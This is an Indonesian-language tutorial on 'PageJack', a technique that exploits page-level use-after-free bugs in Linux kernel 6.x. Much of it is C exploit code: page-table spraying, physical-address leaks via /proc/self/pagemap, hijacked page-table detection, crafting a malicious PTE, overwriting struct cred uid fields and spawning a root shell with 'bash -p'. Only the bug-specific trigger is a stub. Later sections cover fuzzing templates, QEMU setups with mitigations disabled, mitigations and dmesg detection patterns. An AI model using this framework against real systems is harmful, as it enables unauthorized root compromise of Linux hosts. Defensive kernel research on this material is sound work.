PageJack adalah teknik eksploitasi kernel Linux yang memanfaatkan
Page-Level Use-After-Free (UAF) — kondisi di mana sebuah physical page
dilepas (free) namun masih terpetakan ke dalam ruang alamat proses lain
atau masih dapat diakses melalui jalur kernel lain. Berbeda dengan object-level UAF
yang menarget struktur data kernel spesifik (misalnya sk_buff atau
file), PageJack beroperasi di granularitas halaman memori (4KB/2MB/1GB),
memberikan primitif yang jauh lebih powerful.
_refcount)
pada struct page / struct folio mencapai nol secara prematur
(bug pada refcount management), namun physical page tersebut masih terpetakan melalui
Page Table Entry (PTE) milik suatu proses. Penyerang kemudian dapat memicu alokasi
ulang page tersebut untuk data kernel, menghasilkan kondisi
aliasing fisik antara userspace mapping dan data kernel sensitif.
| Aspek | Object-Level UAF | Page-Level UAF (PageJack) |
|---|---|---|
| Unit target | Objek kernel (8B–4KB+) | Physical page (4KB, 2MB, 1GB) |
| Primitif write | Terbatas pada ukuran objek | Seluruh page (4096 byte) |
| Re-use control | Perlu heap spray presisi | Page reclaim + alloc kernel |
| Mitigasi bypass | SLAB isolation, hardened free | Memerlukan bypass memcg, page_owner |
| Dampak maksimum | Privilege escalation via cred | Full physical memory R/W (via page table takeover) |
| Kernel 6.x exposure | SLAB randomization mempersulit | folio refcount bugs masih ditemukan |
Sejak kernel 5.16+, Linux memperkenalkan struct folio sebagai abstraksi
"compound page" yang menggantikan sebagian besar penggunaan langsung struct page.
Memahami keduanya krusial untuk PageJack.
/* Simplified struct page layout (kernel 6.x) */ struct page { unsigned long flags; /* PG_locked, PG_dirty, PG_uptodate, ... */ union { struct { /* Page cache / anon pages */ struct list_head lru; struct address_space *mapping; pgoff_t index; unsigned long private; }; struct { /* SLAB/SLUB allocator */ union { struct list_head slab_list; struct { struct page *next; int pages; int pobjects; }; }; struct kmem_cache *slab_cache; void *freelist; union { void *s_mem; unsigned long counters; struct { unsigned inuse:16; unsigned objects:15; unsigned frozen:1; }; }; }; }; /* === CRITICAL FIELD FOR UAF === */ atomic_t _refcount; /* Page reference count 0 = free to reclaim >0 = in use */ atomic_t _mapcount; /* -1 = not mapped, ≥0 = mapped N+1 times */ #ifdef CONFIG_MEMCG unsigned long memcg_data; #endif };
/* struct folio - Kernel 5.16+ abstraction */ struct folio { /* Identical layout to struct page at offset 0 */ union { struct page page; struct { unsigned long flags; atomic_t _refcount; /* ← TARGET untuk manipulasi */ atomic_t _mapcount; unsigned int _entire_mapcount; unsigned int _nr_pages_mapped; atomic_t _pincount; }; }; unsigned long _folio_pad[6]; };
Kernel Linux x86-64 menggunakan 5-level page table (kernel 6.x dengan LA57). Memahami struktur ini penting karena PageJack pada akhirnya memanipulasi Page Table Entry (PTE) untuk mencapai physical memory aliasing.
Physical pages dikelola oleh Buddy Allocator dalam zone-zone
(ZONE_DMA, ZONE_NORMAL, ZONE_HIGHMEM).
Saat _refcount sebuah page mencapai 0, page dikembalikan ke buddy system
dan dapat dialokasikan ulang oleh komponen kernel lain.
/* Decrement refcount dan free jika nol */ static inline void put_page(struct page *page) { struct folio *folio = page_folio(page); /* * For hugetlb folios, use folio_put_testzero(), which * drops the reference atomically. */ if (folio_test_hugetlb(folio)) return folio_put_hugetlb(folio); /* BUG: jika _refcount sudah 0 sebelum put_page dipanggil, ini double-free → PageJack opportunity */ if (folio_put_testzero(folio)) __folio_put(folio); /* Memanggil free_unref_page() */ } /* Alokasi baru dari buddy system (sisi kernel) */ struct page *alloc_pages(gfp_t gfp_mask, unsigned int order) { return alloc_pages_node(numa_node_id(), gfp_mask, order); }
| Field | Meaning | Siapa yang Mengubah | Nilai Kritis |
|---|---|---|---|
_refcount |
Jumlah referensi total terhadap page (termasuk kernel, VFS, DMA) | get_page() / put_page() |
= 0 → free ke buddy |
_mapcount |
Jumlah PTE yang memetakan page ini | page_add_anon_rmap() / page_remove_rmap() |
-1 = tidak terpetakan |
_pincount |
Pin count (io_uring, RDMA, GUP) | pin_user_pages() / unpin_user_pages() |
0 = tidak di-pin |
_refcount turun ke 0 prematur, page di-free, namun PTE masih aktif (stale PTE)get_page_unless_zero() dan put_page() di path paralelpin_user_pages() gagal track refcount saat page sedang dalam proses split (THP)mremap() atau driver yang menambahkan PTE tambahan tanpa get_page() yang correspondingTransparent Huge Pages (THP) 2MB memiliki compound page dengan head dan tail. Saat split terjadi, ada window race di mana refcount bisa tidak konsisten:
/* Pseudocode ilustrasi bug pattern pada THP split */ int split_huge_page_to_list(struct page *page, struct list_head *list) { struct folio *folio = page_folio(page); struct deferred_split *ds_queue; /* [THREAD A] Ambil refcount untuk split */ if (!folio_ref_freeze(folio, 1)) /* Expects refcount==1 */ return -EBUSY; /* ↓↓↓ RACE WINDOW ↓↓↓ [THREAD B] bisa melakukan get_page() via GUP (Direct I/O, io_uring) Lalu THREAD A melanjutkan split dan free tail pages THREAD B masih memegang refcount ke tail page yang sudah di-free! */ __split_huge_page(page, list, end_swap_pfn()); /* Tail pages di-free ke buddy dengan _refcount = 0 tapi THREAD B masih punya PTE yang menunjuk ke physical page tsb */ for (i = 1; i < nr; i++) { struct page *subpage = page + i; ClearPageHead(subpage); put_page(subpage); /* ← _refcount menjadi 0 → free ke buddy */ } /* namun PTE dari THREAD B masih valid! */ return 0; }
get_user_pages() memegang refcount sementara THP split membebaskan
tail pages. Window kecil namun dapat di-trigger via io_uring atau RDMA.
mremap() yang memindahkan PTE tanpa melakukan get_page()
yang sesuai, menyebabkan page dapat di-free oleh sisi lain sementara PTE baru masih aktif.
mseal() (kernel 6.10+) dan operasi memori lain
yang dapat menyebabkan state inconsistency pada VMA dan page refcount.
| Subsystem | Interface | Risk | Kernel Version |
|---|---|---|---|
| io_uring | IORING_OP_FIXED_FILE, Zero-copy recv | 🔴 Tinggi | 5.1+ |
| THP / Huge Pages | madvise(MADV_HUGEPAGE) | 🟡 Sedang | 2.6.38+ |
| FUSE passthrough | FUSE_PASSTHROUGH | 🔴 Tinggi | 6.9+ |
| userfaultfd | UFFDIO_COPY, UFFDIO_MOVE | 🟡 Sedang | 4.3+ |
| ksmbd (SMB3) | SMB2 compound requests | 🔴 Tinggi | 5.15+ |
| DMA-BUF | dma_buf_export() | 🟡 Sedang | 3.3+ |
| KVM / Nested VMM | EPT/NPT page fault handling | 🔴 Tinggi | All |
Inti dari PageJack adalah menciptakan kondisi di mana satu physical page direferensikan oleh dua entitas berbeda secara bersamaan:
Setelah page di-free secara prematur, penyerang perlu mengendalikan apa yang akan mengalokasikan ulang page tersebut. Target paling powerful adalah membuat page tersebut menjadi sebuah Page Table Page (PTP) — halaman yang berisi PTE-PTE kernel.
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <sys/syscall.h> #include <linux/userfaultfd.h> #include <fcntl.h> #include <pthread.h> /* ───────────────────────────────────────────────── PAGE TABLE SPRAYING Tujuan: paksa kernel mengalokasikan banyak page table pages agar page yang di-free (via bug) ter-reuse sebagai PTP. ───────────────────────────────────────────────── */ #define PT_SPRAY_SIZE 0x10000 /* 64KB per mmap region */ #define PT_SPRAY_COUNT 512 /* Jumlah region untuk spray */ #define PAGE_SIZE 0x1000 struct spray_ctx { void *addrs[PT_SPRAY_COUNT]; int count; int phase; /* 0=spray, 1=selectively free */ }; /* * pt_spray_alloc(): * Allocate banyak mmap region, lalu touch setiap page-nya. * Ini memaksa kernel mengalokasikan PTE pages untuk setiap * 4MB virtual range (1 PTE page per 512 physical pages mapped). */ int pt_spray_alloc(struct spray_ctx *ctx) { for (int i = 0; i < PT_SPRAY_COUNT; i++) { ctx->addrs[i] = mmap(NULL, PT_SPRAY_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (ctx->addrs[i] == MAP_FAILED) { perror("mmap spray"); return -1; } /* Touch setiap page → trigger page fault → kernel alloc PTE */ for (size_t off = 0; off < PT_SPRAY_SIZE; off += PAGE_SIZE) { volatile char *p = (char*)ctx->addrs[i] + off; *p = 0x41; /* Trigger demand paging */ } ctx->count++; } printf("[*] Sprayed %d PTE pages\n", ctx->count); return 0; } /* * pt_spray_free_holes(): * Bebaskan region genap untuk menciptakan "holes" di mana * physical page yang di-free via bug akan jatuh ke slot ini. */ void pt_spray_free_holes(struct spray_ctx *ctx) { for (int i = 0; i < ctx->count; i += 2) { munmap(ctx->addrs[i], PT_SPRAY_SIZE); ctx->addrs[i] = NULL; } printf("[*] Freed %d holes for re-use targeting\n", ctx->count / 2); }
Jika page yang di-free ter-reuse sebagai Page Table Page, penyerang yang masih memiliki stale PTE ke page tersebut kini dapat membaca dan menulis isi tabel page table itu sendiri. Ini memberikan primitif arbitrary PTE write yang sangat powerful.
/proc/self/maps, atau bug info leak lain.
Diperlukan untuk menghitung offset PTE target.
Salah satu tantangan terbesar adalah mengetahui physical address dari page yang di-free. Beberapa teknik:
/proc/self/pagemap: Mengkonversi virtual address ke physical frame number (PFN). Perlu privilege atau kernel di bawah 4.0 untuk akses penuh.page_to_virt() offset.#include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #define PAGE_SIZE 0x1000UL #define PFN_MASK 0x7FFFFFFFFFFFFULL /* bits 0-54 = PFN */ #define PRESENT (1ULL << 63) /* bit 63 = present */ /* * virt_to_phys(): * Konversi virtual address ke physical address menggunakan /proc/self/pagemap. * CATATAN: Kernel ≥ 4.0 memerlukan CAP_SYS_ADMIN untuk akses PFN. * Pada kernel lama atau dengan hak sesuai, ini bekerja tanpa privilege. */ uint64_t virt_to_phys(uintptr_t vaddr) { int fd = open("/proc/self/pagemap", O_RDONLY); if (fd < 0) { perror("pagemap"); return 0; } uint64_t entry = 0; off_t offset = (vaddr / PAGE_SIZE) * sizeof(uint64_t); if (pread(fd, &entry, sizeof(entry), offset) != sizeof(entry)) { perror("pread pagemap"); close(fd); return 0; } close(fd); if (!(entry & PRESENT)) { fprintf(stderr, "Page not present in memory!\n"); return 0; } uint64_t pfn = entry & PFN_MASK; uint64_t paddr = (pfn * PAGE_SIZE) | (vaddr & (PAGE_SIZE - 1)); printf("[*] virt=0x%lx → phys=0x%lx (PFN=%lu)\n", vaddr, paddr, pfn); return paddr; } int main() { /* Alokasikan page, lock agar tidak di-swap */ void *buf = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_LOCKED, -1, 0); *(volatile char*)buf = 0x41; /* touch untuk populate PTE */ uint64_t phys = virt_to_phys((uintptr_t)buf); printf("Physical address: 0x%lx\n", phys); return 0; }
/* * Setelah trigger bug (page freed), spray page tables dan cek * apakah stale mapping kita kini berisi data yang terlihat seperti PTE. * * PTE valid memiliki karakteristik: * - bit 0 (Present) = 1 * - bit 1 (R/W) mungkin set * - bits 12-51: Physical Frame Number yang valid * - Tidak mengandung user-controlled pattern */ #define PTE_PRESENT (1ULL << 0) #define PTE_RW (1ULL << 1) #define PTE_USER (1ULL << 2) #define PTE_NX (1ULL << 63) #define PTE_PFN_MASK 0x000FFFFFFFFFF000ULL static inline int looks_like_pte(uint64_t val) { /* Present, tidak zero, PFN dalam range wajar */ if (!(val & PTE_PRESENT)) return 0; uint64_t pfn = (val & PTE_PFN_MASK) >> 12; if (pfn == 0 || pfn > 0xFFFFFF) return 0; /* Implausible PFN */ return 1; } /* * scan_stale_mapping(): * Scan 4KB page yang tersedia via stale mapping. * Cek apakah isinya terlihat seperti page table (512 × 8-byte PTE entries). */ int scan_stale_mapping(uint64_t *stale_page) { int pte_count = 0; for (int i = 0; i < 512; i++) { if (looks_like_pte(stale_page[i])) { pte_count++; printf(" [PTE %d] 0x%016lx → PFN=0x%lx flags=0x%lx\n", i, stale_page[i], (stale_page[i] & PTE_PFN_MASK) >> 12, stale_page[i] & 0xFFF); } } printf("[*] Found %d/512 valid-looking PTEs in stale mapping\n", pte_count); /* Threshold: jika >100 entries terlihat seperti PTE → ini page table! */ return (pte_count > 100); }
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <pthread.h> #include <errno.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/ioctl.h> #include <sys/wait.h> #include <sched.h> /* ════════════════════════════════════════════════ PAGEJACK EXPLOIT FRAMEWORK Linux Kernel 6.x Page-Level UAF Exploitation ════════════════════════════════════════════════ */ /* ─── Configuration ─── */ #define PAGE_SIZE 0x1000UL #define SPRAY_MAPS 512 /* Number of spray mappings */ #define SPRAY_SIZE (64 * PAGE_SIZE) #define MAX_VULN_FDS 16 /* ─── PTE Flags (x86-64) ─── */ #define PTE_P (1ULL << 0) /* Present */ #define PTE_RW (1ULL << 1) /* Read/Write */ #define PTE_US (1ULL << 2) /* User accessible */ #define PTE_D (1ULL << 6) /* Dirty */ #define PTE_NX (1ULL << 63) /* No-Execute */ #define PTE_PFN(pfn) ((pfn) << 12) #define PTE_VALID_FLAGS (PTE_P | PTE_RW | PTE_D | PTE_NX) /* ─── Global state ─── */ static struct { void *spray_maps[SPRAY_MAPS]; uint64_t target_pfn; /* PFN of freed page (our stale mapping) */ void *stale_virt; /* Userspace VA still mapping target_pfn */ void *rw_mapping; /* R/W window after PT hijack */ int spray_count; int pt_hijack_ok; } g; /* ════════════════════════════════════════════════ PHASE 1: INFO LEAK / KASLR BYPASS ════════════════════════════════════════════════ */ uint64_t leak_kernel_base() { /* * Placeholder: in a real exploit, leverage an info leak bug. * Examples: * - Read from /proc/kallsyms (needs root or debug config) * - Exploit a kernel pointer leak (e.g., uninitialized heap) * - Side-channel (cache timing, speculation) * - Read from /sys/ or /proc/ before kernel 6.x hardening * * For testing: compile kernel with KASLR disabled (nokaslr) */ FILE *f = fopen("/proc/kallsyms", "r"); if (!f) return 0; uint64_t addr; char type, sym[256]; while (fscanf(f, "%lx %c %255s", &addr, &type, sym) == 3) { if (strcmp(sym, "_text") == 0) { fclose(f); printf("[+] Kernel base (_text): 0x%lx\n", addr); return addr; } } fclose(f); return 0; } /* ════════════════════════════════════════════════ PHASE 2: TRIGGER BUG (STUB - VULNERABILITY SPECIFIC) ════════════════════════════════════════════════ */ typedef struct { void *virt_addr; /* Virtual address of the UAF'd page */ uint64_t phys_addr; /* Physical address (obtained before free) */ uint64_t pfn; /* Page Frame Number */ } uaf_page_t; /* * trigger_page_uaf(): * STUB — Isi dengan exploit code untuk CVE spesifik. * * Contoh vulnerability yang dapat diisi di sini: * - CVE-2023-XXXX: THP split race via io_uring + userfaultfd * - CVE-2024-XXXX: mremap double-mapping bug * - CVE-202X-XXXX: Driver DMA-BUF refcount underflow * * Output: `out` harus terisi dengan info page yang di-UAF. */ int trigger_page_uaf(uaf_page_t *out) { printf("[*] Triggering page-level UAF...\n"); /* ── STUB: Ganti dengan trigger nyata ── */ /* * Contoh pola umum: * * 1. Alokasikan page target via mmap() * 2. Dapatkan physical address via /proc/self/pagemap * 3. Pin page via io_uring / pin_user_pages (untuk get_page) * 4. Trigger split / free bug yang menurunkan _refcount ke 0 * meskipun PTE kita masih aktif * 5. Verifikasi page telah di-free (misal via buddy allocator * timing atau /proc/buddyinfo) */ /* Simulasi: alloc + get physical address */ void *target = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (target == MAP_FAILED) { perror("target mmap"); return -1; } *(volatile char*)target = 0xAA; /* Trigger page fault → alloc physical */ out->virt_addr = target; out->phys_addr = virt_to_phys_internal((uintptr_t)target); out->pfn = out->phys_addr >> 12; printf("[+] Target page: virt=%p phys=0x%lx PFN=%lu\n", target, out->phys_addr, out->pfn); /* TODO: Insert actual UAF trigger here (CVE-specific) */ /* After trigger: page should be freed by kernel but `target` virtual address still has a valid PTE */ g.stale_virt = target; g.target_pfn = out->pfn; return 0; } /* ════════════════════════════════════════════════ PHASE 3: PAGE TABLE SPRAY & RE-USE ════════════════════════════════════════════════ */ int spray_page_tables() { printf("[*] Spraying page table pages...\n"); g.spray_count = 0; for (int i = 0; i < SPRAY_MAPS; i++) { g.spray_maps[i] = mmap(NULL, SPRAY_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (g.spray_maps[i] == MAP_FAILED) continue; /* Touch every page to force kernel PTE allocation */ volatile char *p = g.spray_maps[i]; for (size_t off = 0; off < SPRAY_SIZE; off += PAGE_SIZE) { p[off] = (char)i; } g.spray_count++; } printf("[+] Sprayed %d page table regions (%d pages each)\n", g.spray_count, (int)(SPRAY_SIZE/PAGE_SIZE)); return 0; } int check_pt_hijack() { printf("[*] Checking if stale mapping now contains PTEs...\n"); uint64_t *page = (uint64_t *)g.stale_virt; int pte_like = 0; for (int i = 0; i < 512; i++) { uint64_t v = page[i]; /* Heuristic: valid PTE = present + plausible PFN */ if ((v & PTE_P) && ((v >> 12) & 0xFFFFFF) != 0) { pte_like++; } } printf("[*] PTE-like entries in stale page: %d/512\n", pte_like); g.pt_hijack_ok = (pte_like > 50); return g.pt_hijack_ok; } /* ════════════════════════════════════════════════ PHASE 4: EXPLOIT — PTE MANIPULATION ════════════════════════════════════════════════ */ /* * craft_evil_pte(): * Buat PTE entry yang menunjuk ke physical page target. * Digunakan untuk membuat window R/W ke kernel memory. * * target_pfn: PFN dari kernel page yang ingin kita akses * (misalnya page yang berisi struct cred) */ uint64_t craft_evil_pte(uint64_t target_pfn) { /* Present + RW + User-accessible (no NX for writable data) */ return PTE_PFN(target_pfn) | PTE_P | PTE_RW | PTE_US | PTE_D; } /* * find_and_modify_pte(): * Scan stale page (now PT page) untuk menemukan PTE yang menunjuk * ke target physical page, lalu modifikasi untuk keperluan eksploitasi. */ int find_and_modify_pte(uint64_t target_phys, uint64_t evil_phys) { uint64_t *pt_page = (uint64_t *)g.stale_virt; uint64_t target_pfn = target_phys >> 12; uint64_t evil_pfn = evil_phys >> 12; printf("[*] Scanning for PTE pointing to PFN 0x%lx...\n", target_pfn); for (int i = 0; i < 512; i++) { uint64_t pte = pt_page[i]; uint64_t pte_pfn = (pte & 0x000FFFFFFFFFF000ULL) >> 12; if (pte_pfn == target_pfn && (pte & PTE_P)) { printf("[+] Found target PTE at index %d: 0x%016lx\n", i, pte); printf("[*] Overwriting PTE → PFN 0x%lx (evil target)\n", evil_pfn); /* === CRITICAL: PTE OVERWRITE === * Tulis evil PTE melalui stale mapping. * Ini secara efektif mengubah apa yang dimapping oleh * virtual address yang sebelumnya menunjuk ke target_phys. */ pt_page[i] = craft_evil_pte(evil_pfn); /* Flush TLB via mprotect (poor man's INVLPG) */ mprotect(g.stale_virt, PAGE_SIZE, PROT_READ|PROT_WRITE); return i; /* Return index untuk referensi */ } } fprintf(stderr, "[-] Target PTE not found in hijacked PT page\n"); return -1; } /* ════════════════════════════════════════════════ PHASE 5: PRIVILEGE ESCALATION via cred overwrite ════════════════════════════════════════════════ */ /* * struct cred layout (simplified, kernel 6.x) * Offset dari task_struct: * task_struct → real_cred / cred → struct cred * * struct cred { * atomic_t usage; // +0x00 * uid_t uid; // +0x04 * gid_t gid; // +0x08 * uid_t suid; // +0x0C * ... * uid_t euid; // +0x14 * ... * }; */ void overwrite_cred(void *cred_window) { /* cred_window adalah userspace pointer ke mapped kernel cred page */ uint32_t *cred = (uint32_t *)cred_window; printf("[*] Overwriting struct cred...\n"); printf(" Current uid: %u euid: %u\n", getuid(), geteuid()); /* Zero out uid/gid/suid/sgid/euid/egid/fsuid/fsgid */ /* Typical offsets (verify with your kernel version!): */ cred[1] = 0; /* uid */ cred[2] = 0; /* gid */ cred[3] = 0; /* suid */ cred[4] = 0; /* sgid */ cred[5] = 0; /* euid */ cred[6] = 0; /* egid */ cred[7] = 0; /* fsuid */ cred[8] = 0; /* fsgid */ printf("[+] Cred overwritten. New uid: %u euid: %u\n", getuid(), geteuid()); } void spawn_root_shell() { if (getuid() == 0) { printf("\n[!] ROOT OBTAINED! Spawning shell...\n"); execl("/bin/bash", "bash", "-p", NULL); } else { fprintf(stderr, "[-] Not root (uid=%u)\n", getuid()); } } /* ════════════════════════════════════════════════ INTERNAL HELPER: virt → phys ════════════════════════════════════════════════ */ uint64_t virt_to_phys_internal(uintptr_t vaddr) { int fd = open("/proc/self/pagemap", O_RDONLY); if (fd < 0) return 0; uint64_t e = 0; pread(fd, &e, 8, (vaddr / PAGE_SIZE) * 8); close(fd); if (!(e >> 63)) return 0; return ((e & 0x7FFFFFFFFFFFFULL) * PAGE_SIZE) | (vaddr & (PAGE_SIZE-1)); } /* ════════════════════════════════════════════════ MAIN ════════════════════════════════════════════════ */ int main(int argc, char **argv) { printf("\n" "╔══════════════════════════════════════╗\n" "║ PageJack: Linux Kernel Page-UAF ║\n" "║ Research Framework v1.0 ║\n" "╚══════════════════════════════════════╝\n\n"); printf("[*] Running as uid=%u pid=%d\n", getuid(), getpid()); /* ── Phase 1: Info Leak ── */ uint64_t kbase = leak_kernel_base(); if (!kbase) { fprintf(stderr, "[-] Failed to leak kernel base (non-fatal, proceeding)\n"); } /* ── Phase 2: Trigger UAF ── */ uaf_page_t uaf = {0}; if (trigger_page_uaf(&uaf) < 0) { fprintf(stderr, "[-] UAF trigger failed\n"); return 1; } printf("[+] UAF page: virt=%p phys=0x%lx PFN=%lu\n", uaf.virt_addr, uaf.phys_addr, uaf.pfn); /* ── Phase 3: Spray Page Tables ── */ spray_page_tables(); /* ── Check PT Hijack ── */ if (!check_pt_hijack()) { fprintf(stderr, "[-] Page table hijack not confirmed. Retry or adjust spray.\n"); return 1; } printf("[+] Page table hijack CONFIRMED!\n"); /* ── Phase 4: Find cred page and map it ── * In a real exploit: * 1. Leak address of current->cred via kernel pointer leak * 2. Compute physical address of cred page * 3. Modify PTE in hijacked PT to map cred page to userspace * 4. Overwrite uid/gid fields * * Here we demonstrate the structure: */ printf("[*] TODO: locate struct cred physical address via leak\n"); printf("[*] TODO: modify PTE via hijacked page table\n"); printf("[*] TODO: overwrite uid/gid in mapped cred page\n"); /* ── Phase 5: Spawn root shell ── */ spawn_root_shell(); printf("[*] Exploit complete. Cleaning up.\n"); return 0; }
Untuk hunting page-level UAF baru via syzkaller, berikut template syzlang yang menarget operasi yang rentan terhadap refcount race:
# Syzlang description: Fuzz page refcount paths # Target: Page lifecycle bugs, THP split races, GUP UAF # Usage: Include in syzkaller config under "enable_syscalls" resource fd_uffd[fd] # userfaultfd(2) — powerful primitive for race triggering userfaultfd(flags flags[uffd_flags]) fd_uffd ioctl$UFFDIO_API(fd fd_uffd, cmd const[UFFDIO_API], arg ptr[in, uffdio_api]) ioctl$UFFDIO_REGISTER(fd fd_uffd, cmd const[UFFDIO_REGISTER], arg ptr[in, uffdio_register]) ioctl$UFFDIO_COPY(fd fd_uffd, cmd const[UFFDIO_COPY], arg ptr[inout, uffdio_copy]) ioctl$UFFDIO_MOVE(fd fd_uffd, cmd const[UFFDIO_MOVE], arg ptr[inout, uffdio_move]) # madvise — trigger THP split, MADV_DONTNEED, MADV_FREE madvise(addr vma, length len[addr], advice flags[madvise_flags]) # mremap — historical source of page refcount bugs mremap(old_addr vma, old_size len[old_addr], new_size int32, flags flags[mremap_flags], new_addr vma) # mmap with MAP_FIXED — useful for controlled aliasing mmap$anon_fixed(addr vma, length len[addr], prot flags[mmap_prot], flags const[MAP_PRIVATE_ANON_FIXED], fd const[-1], offset const[0]) # process_madvise — cross-process memory ops (Linux 5.10+) process_madvise(pidfd fd_pidfd, vec ptr[in, array[iovec]], vlen len[vec], advice flags[madvise_flags], flags const[0]) uffd_flags = O_CLOEXEC, O_NONBLOCK, UFFD_USER_MODE_ONLY madvise_flags = MADV_HUGEPAGE, MADV_NOHUGEPAGE, MADV_DONTNEED, MADV_FREE, MADV_COLD, MADV_PAGEOUT, MADV_SPLIT mremap_flags = MREMAP_MAYMOVE, MREMAP_FIXED, MREMAP_DONTUNMAP mmap_prot = PROT_READ, PROT_WRITE, PROT_READ_WRITE define MAP_PRIVATE_ANON_FIXED (MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED)
#!/bin/bash # QEMU environment untuk testing PageJack exploits # Kernel dikompile dengan debugging flags untuk research KERNEL="./bzImage" ROOTFS="./rootfs.img" PORT=2222 qemu-system-x86_64 \ -kernel "$KERNEL" \ -drive file="$ROOTFS",format=raw \ -append "root=/dev/sda console=ttyS0 \ nokaslr \ nosmap nosmep \ pti=off \ mitigations=off \ slub_debug=FZPU \ page_alloc.shuffle=0 \ transparent_hugepage=always \ init=/sbin/init" \ -nographic \ -m 4G \ -smp 4 \ -enable-kvm \ -cpu host,+smep,-smap \ -netdev user,id=net0,hostfwd=tcp::${PORT}-:22 \ -device virtio-net-pci,netdev=net0 \ -device virtio-balloon \ -snapshot # Kernel config flags untuk research build: # CONFIG_KASAN=y # AddressSanitizer # CONFIG_KASAN_INLINE=y # CONFIG_PAGE_OWNER=y # Track page ownership # CONFIG_DEBUG_PAGEALLOC=y # Poison freed pages (caution: sangat lambat) # CONFIG_SLUB_DEBUG=y # CONFIG_DEBUG_VM=y # CONFIG_TRANSPARENT_HUGEPAGE=y # CONFIG_USERFAULTFD=y # CONFIG_DEBUG_LIST=y # CONFIG_LOCKDEP=y
#!/bin/bash # Build Linux kernel dengan debugging untuk PageJack research KERNEL_VER="6.8" JOBS=$(nproc) cd linux-$KERNEL_VER # Minimal config dengan debugging make x86_64_defconfig ./scripts/config \ -e KASAN \ -e KASAN_INLINE \ -e PAGE_OWNER \ -e SLUB_DEBUG \ -e DEBUG_VM \ -e DEBUG_PAGEALLOC \ -e TRANSPARENT_HUGEPAGE \ -e TRANSPARENT_HUGEPAGE_ALWAYS \ -e USERFAULTFD \ -e IO_URING \ -e FUSE_FS \ -e DEBUG_LIST \ -e PROVE_LOCKING \ -d RANDOMIZE_BASE \ -d SMAP \ -d SMEP make olddefconfig make -j$JOBS bzImage 2>&1 | tee build.log echo "[+] Build done. Check build.log for errors."
| Mitigasi | Mekanisme | Kernel Version | Efektivitas vs PageJack |
|---|---|---|---|
| KPTI (PTI) | Pisahkan page table kernel/user. Kernel PT tidak visible dari userspace | 4.15+ | 🟡 Partial — masih ada user-accessible PTEs |
| CONFIG_DEBUG_PAGEALLOC | Poison page yang di-free dengan pola khusus, trap akses ke freed pages | All | 🟢 Efektif untuk detection, tapi dinonaktifkan di production |
| page_owner tracking | Track alokasi page untuk mendeteksi double-free dan UAF | 4.5+ | 🟢 Detection only, tidak preventif |
| KASAN (Kernel ASan) | Instrument akses memori, deteksi UAF dan OOB | 4.0+ | 🟡 Deteksi object-level, kurang efektif untuk page-level |
| folio refcount checks | Verifikasi refcount sebelum operasi page | 5.16+ | 🟡 Ada gaps tergantung path yang diambil |
| mseal() (Linux 6.10) | Seal VMA agar tidak dapat di-unmap/remap | 6.10+ | 🟡 Mempersulit beberapa attack path |
| GUP pin vs get | Pembedaan FOLL_PIN vs FOLL_GET untuk refcount semantics |
5.6+ | 🟢 Menutup sebagian besar GUP UAF paths |
# Symptoms di dmesg yang mengindikasikan page-level UAF # 1. BUG: Bad page state dmesg | grep -E "Bad page state|bad_page" # 2. BUG: Bad page map (stale PTE detected) dmesg | grep -E "Bad page map|bad_pte" # 3. WARNING di mm/rmap.c (unmapping halaman yang sudah di-free) dmesg | grep -E "page_remove_rmap|warn_free_bad|unlink_anon_vmas" # 4. KASAN report untuk use-after-free di page allocation dmesg | grep -A20 "KASAN: use-after-free" # 5. Refcount underflow dmesg | grep -E "refcount_t: underflow|page ref count" # Monitor secara real-time: watch -n1 'dmesg | tail -30 | grep -E "BUG|WARNING|KASAN|bad page"'
mm/page_alloc.c — Buddy allocator, __alloc_pages(), free_unref_page()mm/rmap.c — Reverse mapping, page_add_anon_rmap(), page_remove_rmap()mm/huge_memory.c — THP split, split_huge_page_to_list()mm/gup.c — Get User Pages, pin_user_pages(), get_user_pages_fast()include/linux/mm_types.h — struct page, struct folioarch/x86/mm/fault.c — Page fault handler, PTE operationsmm/userfaultfd.c — Userfaultfd implementationbad page state atau refcount anomali/proc/self/pagemap